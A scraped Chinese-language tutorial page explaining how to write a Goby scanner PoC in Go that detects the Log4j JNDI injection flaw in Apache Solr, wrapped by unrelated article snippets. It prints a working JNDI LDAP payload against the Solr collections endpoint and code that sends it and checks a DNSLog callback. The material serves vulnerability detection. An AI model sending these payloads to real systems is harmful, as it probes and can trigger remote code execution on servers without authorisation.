<em>Mac</em>Book项目 2009年学校开始实施<em>Mac</em>Book项目,所有师生配备一本<em>Mac</em>Book,并同步更新了校园无线网络。学校每周进行电脑技术更新,每月发送技术支持资料,极大改变了教学及学习方式。因此2011
2021-06-01 09:32:01
前段時間的Log4j漏洞影響很廣泛,網上已經公開了很多地方的利用方式,而平時用goby較多,就想利用goby的指紋識別對目標定向檢測。這篇文章就從Apache Solr Log4j漏洞為例,教大家如何寫goby poc,文章中有錯誤還請及時指正。
Goby可以通過編寫go檔案,來實現一些高階的漏洞檢測或利用,例如dnslog檢測漏洞
詳情可查閱goby官方檔案:https://cn.gobies.org/docs/exp/index.html
首先了解到漏洞觸發點是action引數,
/solr/admin/collections?action=
通過dnslog驗證到靶機是存在漏洞。
payload:${jndi:ldap://24x44x.dnslog.cn/a}
圖一:傳送payload
圖二:dnslog有回顯
Goby是通過golang編寫的,而一些漏洞檢測場景(比如dnslog驗證),goby自身的JSON 格式無法滿足這一需求,需採用 Golang 編寫漏洞程式碼。
1、首先通過goby poc管理,新增poc,按照goby官方漏洞描述模版說明填寫並儲存。
圖三:自定義poc
2、在goby安裝目錄的golibexploitsuser資料夾開啟生成的Apache_Solr_Log4j_JNDI_RCE.json檔案,如果不需要exp則需把HasExp欄位的true改為false。
圖四:生成的json檔案
3、將生成的json程式碼(去掉外圍大括號)複製到goby漏洞檢測golang模板的expJson := {xxx}
中。
package exploits import ( //根據需求匯入相應的包 "fmt" "git.gobies.org/goby/goscanner/goutils" "git.gobies.org/goby/goscanner/jsonvul" "git.gobies.org/goby/goscanner/godclient" "git.gobies.org/goby/goscanner/scanconfig" "git.gobies.org/goby/httpclient" "strings" "time" ) func init() { expJson := `{ expJson部分 }` ExpManager.AddExploit(NewExploit( goutils.GetFileName(), expJson, nil, //自定義POC函數部分。 nil, //自定義EXP函數, 沒有EXP,就寫nil, )) }
goby漏洞檢測golang模板
1、根據官方檔案說明
自定義 POC 由一個函數構成,該函數引數分為
jsonvul.JsonVul、httpclient.FixUrl、scanconfig.SingleScanConfig 結構體組成,通過響應 bool 來確認漏洞是否存在。函數模版如下:
func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { return false }
需要通過編寫檢測漏洞是否存在的golang程式碼,檢測到漏洞存在則返回true,不存在返回false。
圖五:自定義 POC函數部分
checkStr := goutils.RandomHexString(4)
RandomHexString函數:隨機生成指定長度的字串
checkUrl, isDomain := godclient.GetGodCheckURL(checkStr)
GetGodCheckURL函數:生成DNSLog地址
uri := "/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D." + checkUrl + "/a%7D"
漏洞觸發點拼接payload
cfg := httpclient.NewGetRequestConfig(uri) //NewGetRequestConfig:構建GET請求自定義設定,返回RequestConfig cfg.VerifyTls = false //忽略ssl驗證 cfg.FollowRedirect = false //不跟隨跳轉 cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") //自定義請求頭 httpclient.DoHttpRequest(u, cfg) //DoHttpRequest:構建自定義請求設定,傳送請求,返回請求結果HttpResponse
構建並行送自定義設定的GET請求,返回請求結果HttpResponse
圖六:通過代理抓取到goby傳送payload的get請求
return godclient.PullExists(checkStr, time.Second*15)
在一段時間內檢測dnslog是否有HTTP請求成功,如果成功返回true,否則返回false。
圖七:通過代理抓取到goby檢測dnslog是否有HTTP請求成功
圖八:漏洞檢測成功
注意點:
當然除了solr還有很多框架,希望大家能從文章中學到一點知識,打磨自己的武器。
以上就是網路安全滲透測試使用goby檢測log4j漏洞的詳細內容,更多關於使用goby檢測log4j漏洞的資料請關注it145.com其它相關文章!
相關文章
<em>Mac</em>Book项目 2009年学校开始实施<em>Mac</em>Book项目,所有师生配备一本<em>Mac</em>Book,并同步更新了校园无线网络。学校每周进行电脑技术更新,每月发送技术支持资料,极大改变了教学及学习方式。因此2011
2021-06-01 09:32:01
综合看Anker超能充系列的性价比很高,并且与不仅和iPhone12/苹果<em>Mac</em>Book很配,而且适合多设备充电需求的日常使用或差旅场景,不管是安卓还是Switch同样也能用得上它,希望这次分享能给准备购入充电器的小伙伴们有所
2021-06-01 09:31:42
除了L4WUDU与吴亦凡已经多次共事,成为了明面上的厂牌成员,吴亦凡还曾带领20XXCLUB全队参加2020年的一场音乐节,这也是20XXCLUB首次全员合照,王嗣尧Turbo、陈彦希Regi、<em>Mac</em> Ova Seas、林渝植等人全部出场。然而让
2021-06-01 09:31:34
目前应用IPFS的机构:1 谷歌<em>浏览器</em>支持IPFS分布式协议 2 万维网 (历史档案博物馆)数据库 3 火狐<em>浏览器</em>支持 IPFS分布式协议 4 EOS 等数字货币数据存储 5 美国国会图书馆,历史资料永久保存在 IPFS 6 加
2021-06-01 09:31:24
开拓者的车机是兼容苹果和<em>安卓</em>,虽然我不怎么用,但确实兼顾了我家人的很多需求:副驾的门板还配有解锁开关,有的时候老婆开车,下车的时候偶尔会忘记解锁,我在副驾驶可以自己开门:第二排设计很好,不仅配置了一个很大的
2021-06-01 09:30:48
不仅是<em>安卓</em>手机,苹果手机的降价力度也是前所未有了,iPhone12也“跳水价”了,发布价是6799元,如今已经跌至5308元,降价幅度超过1400元,最新定价确认了。iPhone12是苹果首款5G手机,同时也是全球首款5nm芯片的智能机,它
2021-06-01 09:30:45